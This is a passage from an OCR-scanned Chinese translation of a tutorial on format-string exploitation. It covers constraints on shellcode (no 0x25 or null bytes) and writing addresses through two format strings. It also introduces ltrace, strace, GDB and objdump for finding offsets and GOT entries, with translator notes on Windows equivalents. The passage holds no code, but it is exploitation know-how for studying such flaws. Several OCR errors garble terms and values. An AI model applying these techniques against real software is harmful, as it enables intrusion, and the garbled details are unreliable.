每 个 漏洞 和 利用 都 是 不 同 的 ， 在 说 它 不 可 利用 之 前 ， 你 应 该 花费 几 个 小 时 来 学 习 漏洞 ， 并 且 
你 有 可 能 是 错 的 ， 因 为 这 里 展示 的 不 仅仅 是 格式 化 字符 串 漏洞 的 历史 。 (你 好 ，OpenBSD 
A!) 


6.5 特殊 的 考虑 


除了 利用 自身 ， 也 有 一 些 需要 考虑 的 东西 。 如 果 格 式 化 字符 串 含有 shellcode， 它 不 能 包 

含 \x25 ( % ) 或 者 空 字 节 。 但 是 由 于 没有 重要 的 操作 码 是 gx25 或 者 oxoo ， 你 在 构造 
shellcode 时 不 会 有 什么 麻烦 。 如 果 地 址 储存 在 格式 化 字符 串 中 ， 是 一 样 的 。 如 果 你 想 要 写 入 
的 地 址 包含 空 字符 ， 你 可 以 将 其 替换 为 某 个 奇数 地 址 的 短 整 形 写 入 ， 它 位 于 你 想 要 写 入 的 地 
址 下 方 。 虽 然 它 在 所 有 架构 上 都 是 不 可 能 的 。 同 样 ， 你 也 可 以 使 用 两 个 单独 的 格式 化 字符 

囊 。 第 一 个 在 内 存 中 ， 整 个 字符 串 的 后 面 创 建 你 打算 写 入 的 地 址 。 第 二 个 使 用 这 个 地 址 来 写 
入 它 。 


这 可 能 变 得 有 些 复杂 ， 但 是 可 以 可 靠 地 利用 ， 并 且 有 时 值得 花费 精力 。 


七 、 工 具 


一 旦 利用 完成 ， 或 者 甚至 在 利用 开发 过 程 中 ， 使 用 工具 来 获取 必要 的 偏 移 更 加 有 有 用。 一些 工 
具 也 有 主意 识别 漏洞 ， 例 如 在 闭 源 软件 中 的 格式 化 字符 串 漏洞 。 我 在 这 里 列 出 了 四 个 工具 ， 
它们 对 我 来 说 很 有 用 ， 可 能 对 你 也 是 。 


7.1 l1trace >’ strace 


ltrace [8] 和 strace B] 工作 方式 相似 : 在 程序 调用 它们 时 ， 它 们 勾 住 库 和 系统 调用 ， 记 录 
它们 的 参数 和 返回 值 。 这 让 你 能 够 观察 程序 如 何 和 系统 交互 ， 将 程序 本 身 看 做 黑 盒 。 


所 有 现存 的 格式 化 函数 都 是 库 调 用 ， 并 且 它 们 的 参数 ， 最 重要 的 是 它们 的 地 址 都 可 以 使 

用 itrace 来 观察 。 任 何 可 以 使 用 ptrace 的 进程 中 ， 你 都 可 以 使 用 这 个 方式 快速 判断 格式 化 
字符 串 的 地 址 。 strace 用 于 获取 缓冲 区 地 址 ， 数 据 读 入 到 该 地 址 中 ， 例 如 如 果 read 被 调用 
来 读 取 数据 ， 它 们 之 后 又 用 作 格 式 化 字符 串 。 


了 解 这 两 个 工具 的 用 法 ， 你 可 以 节省 大 量 时 间 ， 你 也 可 以 使 用 它们 来 尝试 将 GDB 附加 到 过 时 
的 程序 上 ， 它 没有 任何 符号 和 编译 器 优化 ， 来 寻找 两 个 简单 的 偏 移 。 


译 者 注 : 在 Windows 平台 上 ， 你 可 以 使 用 SysinternalsSuite 来 观察 文件 、 注 册 表 和 API 
的 使 用 情况 。 


7.2 GDB > objdump 


GDB [7] > 2384) GNU 调试 器 ， 是 一 个 基于 文本 的 调试 器 ， 它 适用 于 源码 和 机 器 代码 级 别 的 
调试 。 虽 然 它 看 起 来 并 不 舒服 ， 一 旦 你 熟悉 了 它 ， 它 就 是 程序 内 部 的 强大 接口 。 对 于 任何 事 
情 ， 从 调试 你 的 利用 ， 到 观察 进程 被 利用 ， 它 都 非常 好 用 。 
objdump ， 一 个 GNU 三 进 制 工 具 包 中 的 程序 ， 适 用 于 从 可 执行 二 进 制 或 目标 文件 中 获取 任何 
信息 ， 例 如 内 存 布局 ， 区 段 或 main 函数 的 反 汇 编 。 我 们 主要 使 用 它 来 从 二 进 制 中 获取 GOT 
条 目的 地 址 。 但 是 它 可 以 以 很 多 不 同 的 方式 使 用 。 

译 者 注 : 这 两 个 工具 都 在 build-essential 包 中 ， 可 以 执 

行 apt-get install build-essential 来 安装 。 

译 者 注 : 在 Windows 平台 上 ， 你 可 以 使 用 OllyDbg 或 者 WinDbg (x86，x64) 来 代替 

GDB， 你 可 以 使 用 IDA Pro 来 代替 "objdump。 
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